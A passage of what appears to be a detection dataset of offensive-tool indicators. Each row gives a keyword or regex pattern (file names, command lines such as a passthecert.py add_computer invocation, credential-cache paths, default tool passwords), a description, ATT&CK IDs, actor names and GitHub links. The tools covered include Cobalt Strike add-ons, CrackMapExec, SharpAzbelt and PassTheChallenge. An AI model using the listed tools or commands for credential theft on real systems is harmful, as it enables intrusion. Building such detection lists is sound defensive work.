APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*parse_aggressor_properties*",".{0,1000}parse_aggressor_properties.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*parse_nessus_file*",".{0,1000}parse_nessus_file.{0,1000}","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*parse_nmap_xml*",".{0,1000}parse_nmap_xml.{0,1000}","offensive_tool_keyword","crackmapexec","function name from nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*parse_shellcode*",".{0,1000}parse_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*ParseGPPPasswordFromXml*",".{0,1000}ParseGPPPasswordFromXml.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*ParseMSALCache*.azure\msal_token_cache.bin*",".{0,1000}ParseMSALCache.{0,1000}\.azure\\msal_token_cache\.bin.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*ParseMSALCache*Appdata\Local\.IdentityService\msal.cache*",".{0,1000}ParseMSALCache.{0,1000}Appdata\\Local\\\.IdentityService\\msal\.cache.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*parser.exe -a *.dmp*",".{0,1000}parser\.exe\s\-a\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","172","24","2024-02-25T13:18:10Z","2022-01-30T18:56:21Z" "*parser.exe -a *.dmp*",".{0,1000}parser\.exe\s\-a\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","172","24","2024-02-25T13:18:10Z","2022-01-30T18:56:21Z" "*PassDetective extract*",".{0,1000}PassDetective\sextract.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","2","107","8","2024-04-25T12:51:21Z","2023-07-22T12:31:57Z" "*PassDetective-main.*",".{0,1000}PassDetective\-main\..{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","2","107","8","2024-04-25T12:51:21Z","2023-07-22T12:31:57Z" "*passhunt.exe*",".{0,1000}passhunt\.exe.{0,1000}","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","62","33","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" "*passhunt.exe*",".{0,1000}passhunt\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*passhunt.py*",".{0,1000}passhunt\.py.{0,1000}","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","62","33","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" "*passivex.asm*",".{0,1000}passivex\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*passivex.dll*",".{0,1000}passivex\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*passphrase-rule1.rule*",".{0,1000}passphrase\-rule1\.rule.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*passphrase-rule2.rule*",".{0,1000}passphrase\-rule2\.rule.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*passphrase-wordlist*",".{0,1000}passphrase\-wordlist.{0,1000}","offensive_tool_keyword","passphrase-wordlist","This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1.000 permutations of each phase.","T1003 - T1110 - T1113 - T1137","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/initstring/passphrase-wordlist","1","0","N/A","N/A","10","1145","157","2023-11-14T11:46:14Z","2017-12-05T20:53:13Z" "*PassSpray.ps1*",".{0,1000}PassSpray\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*pass-station search tomcat*",".{0,1000}pass\-station\ssearch\stomcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*PassTheCert.csproj*",".{0,1000}PassTheCert\.csproj.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*PassTheCert.exe*",".{0,1000}PassTheCert\.exe.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*PassTheCert.exe*",".{0,1000}PassTheCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*passthecert.py -action add_computer -crt user.crt -key user.key -domain * -dc-ip *",".{0,1000}passthecert\.py\s\-action\sadd_computer\s\-crt\suser\.crt\s\-key\suser\.key\s\-domain\s.{0,1000}\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*passthecert.py*",".{0,1000}passthecert\.py.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)*",".{0,1000}Pass\-the\-Challenge\s\(PtC\)\s\-\sby\sOliver\sLyak\s\(ly4k\).{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PassTheChallenge.cpp*",".{0,1000}PassTheChallenge\.cpp.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PassTheChallenge.exe*",".{0,1000}PassTheChallenge\.exe.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PassTheChallenge.pdb*",".{0,1000}PassTheChallenge\.pdb.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PassTheChallenge.sln*",".{0,1000}PassTheChallenge\.sln.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PassTheChallenge.vcxproj*",".{0,1000}PassTheChallenge\.vcxproj.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PassTheHash(*",".{0,1000}PassTheHash\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*passthehashbrowns/BOFMask*",".{0,1000}passthehashbrowns\/BOFMask.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","2","100","23","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" "*passthehashbrowns/SharpRDPThief*",".{0,1000}passthehashbrowns\/SharpRDPThief.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*passware-kit-forensic.sls*",".{0,1000}passware\-kit\-forensic\.sls.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PasswareKitForensic_*_Setup.dmg*",".{0,1000}PasswareKitForensic_.{0,1000}_Setup\.dmg.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PasswareKitForensic_*_Setup.msi*",".{0,1000}PasswareKitForensic_.{0,1000}_Setup\.msi.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*passware-kit-forensic-64bit.msi*",".{0,1000}passware\-kit\-forensic\-64bit\.msi.{0,1000}","offensive_tool_keyword","Passware Kit Forensic","Passware Kit Forensic is the complete encrypted electronic evidence discovery solution that reports and decrypts all password-protected items on a computer","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.passware.com/kit-forensic/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PASSWORD = ""Letmein123!*",".{0,1000}PASSWORD\s\=\s\""Letmein123!.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*password = 'b4bysh4rk'*",".{0,1000}password\s\=\s\'b4bysh4rk\'.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*password = 'tdragon6'*",".{0,1000}password\s\=\s\'tdragon6\'.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*Password to use for ADWS Connection*",".{0,1000}Password\sto\suse\sfor\sADWS\sConnection.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*Password*S0urce0fThePr0blem*",".{0,1000}Password.{0,1000}S0urce0fThePr0blem.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Password*S3cr3tS3rvic3*",".{0,1000}Password.{0,1000}S3cr3tS3rvic3.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Password*Winter2017*",".{0,1000}Password.{0,1000}Winter2017.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Password: socksPass*",".{0,1000}Password\:\ssocksPass.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*Password:Waza1234*",".{0,1000}Password\:Waza1234.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*password_box.py*",".{0,1000}password_box\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*password_cracker.rb*",".{0,1000}password_cracker\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*password_crackers*",".{0,1000}password_crackers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Password_Cracking.sh*",".{0,1000}Password_Cracking\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*password_prompt_spoof.md*",".{0,1000}password_prompt_spoof\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*password|passwort|passwd|*",".{0,1000}password\|passwort\|passwd\|.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*password|pwd|creds|cred|secret|userpw*",".{0,1000}password\|pwd\|creds\|cred\|secret\|userpw.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 